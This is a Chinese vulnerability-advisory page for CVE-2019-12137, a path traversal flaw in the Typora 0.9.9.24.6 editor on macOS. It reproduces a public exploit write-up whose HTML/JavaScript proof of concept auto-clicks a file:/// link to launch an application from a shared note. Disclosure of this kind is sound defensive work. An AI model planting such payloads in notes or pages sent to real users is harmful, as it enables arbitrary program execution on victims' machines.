typora 路径遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1612673 漏洞类型 路径遍历
发布时间 2019-05-29 更新时间 2019-05-29
CVE编号 CVE-2019-12137 CNNVD-ID CNNVD-201905-722
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019050297
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201905-722
|漏洞详情
typora是一款编辑器。 typora 0.9.9.24.6版本(macOS)中存在目录遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。
|漏洞EXP
Exploit Title: Code execution via path traversal
# Date: 17-05-2019
# Exploit Author: Dhiraj Mishra
# Vendor Homepage: http://typora.io
# Software Link: https://typora.io/download/Typora.dmg
# Version: 0.9.9.24.6
# Tested on: macOS Mojave v10.14.4
# CVE: CVE-2019-12137
# References:
# https://nvd.nist.gov/vuln/detail/CVE-2019-12137
# https://github.com/typora/typora-issues/issues/2505

Summary:
Typora 0.9.9.24.6 on macOS allows directory traversal, for the execution of
arbitrary programs, via a file:/// or ../ substring in a shared note via
abusing URI schemes.

Technical observation:
A crafted URI can be used in a note to perform this attack using file:///
has an argument or by traversing to any directory like
(../../../../something.app).

Since, Typro also has a feature of sharing notes, in such case attacker
could leverage this vulnerability and send crafted notes to the
victim to perform any further attack.

Simple exploit code would be:

<body>
<a href="file:\\\Applications\Calculator.app" id=inputzero>
  <img src="someimage.jpeg" alt="inputzero" width="104" height="142">
</a>
<script>
(function download() {
    document.getElementById('inputzero').click();
})()
</script>
</body>
|参考资料

来源:github.com

链接:https://github.com/typora/typora-issues/issues/2505


来源:nvd.nist.gov

链接:https://nvd.nist.gov/vuln/detail/CVE-2019-12137